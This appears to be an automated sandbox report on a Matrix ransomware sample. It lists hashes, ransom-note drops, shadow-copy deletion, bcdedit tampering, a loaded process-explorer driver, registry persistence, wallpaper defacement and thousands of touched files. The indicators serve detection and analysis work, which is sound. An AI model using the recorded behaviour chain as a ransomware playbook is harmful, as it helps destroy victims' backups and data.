matrix | 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

Analysis

max time kernel
150s
max time network
20s
platform
windows7_x64
resource
win7v200722
submitted
08-10-2020 15:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Size

1.2MB
MD5

907636b28d162f7110b067a8178fa38c
SHA1

048ae4691fe267e7c8d9eda5361663593747142a
SHA256

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
SHA512

501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Score

10^/10

ransomware evasion upx persistence matrix discovery

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 498 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exereg.exe

description	ioc	process
File created	C:\Program Files\Microsoft Office\Office14\1033\Bibliography\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\WSS\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\QUERIES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Users\Admin\Music\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Users\Admin\Favorites\Microsoft Websites\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\TileWallpaper = "0"	reg.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\1036\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jre7\lib\fonts\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\hrtfs\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Mozilla Firefox\browser\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Users\Admin\Favorites\Links\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1544 bcdedit.exe
556 bcdedit.exe
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

10 1164 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

GBVottoK64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS GBVottoK64.exe
Executes dropped EXE 3 IoCs

Processes:

NWodi944.exeGBVottoK.exeGBVottoK64.exe

pid process

1968 NWodi944.exe
1284 GBVottoK.exe
1216 GBVottoK64.exe

pid	process
1544	bcdedit.exe
556	bcdedit.exe

flow	pid	process
10	1164	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	GBVottoK64.exe

pid	process
1968	NWodi944.exe
1284	GBVottoK.exe
1216	GBVottoK64.exe

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\ReadRegister.tiff	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Users\Admin\Pictures\InitializeConvert.tiff	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\GBVottoK.exe	upx
C:\Users\Admin\AppData\Local\Temp\GBVottoK.exe	upx
C:\Users\Admin\AppData\Local\Temp\GBVottoK.exe	upx

Loads dropped DLL 4 IoCs

Processes:

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.execmd.exeGBVottoK.exe

pid	process
1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
1064	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
1000	cmd.exe
1284	GBVottoK.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exe

pid process

1480 takeown.exe

pid	process
1480	takeown.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exeGBVottoK64.exe

description	ioc	process
File opened (read-only)	\??\K:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\F:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\J:	GBVottoK64.exe
File opened (read-only)	\??\P:	GBVottoK64.exe
File opened (read-only)	\??\Q:	GBVottoK64.exe
File opened (read-only)	\??\S:	GBVottoK64.exe
File opened (read-only)	\??\Y:	GBVottoK64.exe
File opened (read-only)	\??\P:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\L:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\F:	GBVottoK64.exe
File opened (read-only)	\??\K:	GBVottoK64.exe
File opened (read-only)	\??\L:	GBVottoK64.exe
File opened (read-only)	\??\U:	GBVottoK64.exe
File opened (read-only)	\??\R:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\Q:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\E:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\N:	GBVottoK64.exe
File opened (read-only)	\??\O:	GBVottoK64.exe
File opened (read-only)	\??\R:	GBVottoK64.exe
File opened (read-only)	\??\X:	GBVottoK64.exe
File opened (read-only)	\??\Z:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\W:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\N:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\J:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\A:	GBVottoK64.exe
File opened (read-only)	\??\H:	GBVottoK64.exe
File opened (read-only)	\??\W:	GBVottoK64.exe
File opened (read-only)	\??\X:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\U:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\S:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\M:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\G:	GBVottoK64.exe
File opened (read-only)	\??\Z:	GBVottoK64.exe
File opened (read-only)	\??\V:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\T:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\O:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\M:	GBVottoK64.exe
File opened (read-only)	\??\I:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\G:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\B:	GBVottoK64.exe
File opened (read-only)	\??\E:	GBVottoK64.exe
File opened (read-only)	\??\I:	GBVottoK64.exe
File opened (read-only)	\??\Y:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\H:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\T:	GBVottoK64.exe
File opened (read-only)	\??\V:	GBVottoK64.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 myexternalip.com

flow	ioc
9	myexternalip.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Modifies service 2 TTPs 11 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exeGBVottoK64.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152	GBVottoK64.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Start = "3"	GBVottoK64.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	GBVottoK64.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Type = "1"	GBVottoK64.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ErrorControl = "1"	GBVottoK64.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152	GBVottoK64.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\BJ2ttsem.bmp"	reg.exe

Drops file in Program Files directory 7625 IoCs

Processes:

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

description	ioc	process
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\203x8subpicture.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00578_.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-BR.pak	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jre7\lib\jfr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\MSPUB.DEV.HXS	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Templates\1033\AdjacencyLetter.dotx	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01145_.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR21F.GIF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BOATINST.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ERROR.GIF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\List.accdt	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\LightSpirit.css	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02444_.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK_K_COL.HXK	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ADD.GIF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7EN.LEX	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotslightoverlay.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01182_.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285360.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_choosefont.gif	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0301252.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LTHD98SP.POC	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\vignettemask25.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB01741L.GIF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\security\javafx.policy	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18221_.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\RADAR.WAV	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG.wmv	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Cuiaba	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\Document Themes 14\Paper.thmx	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086420.WMF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
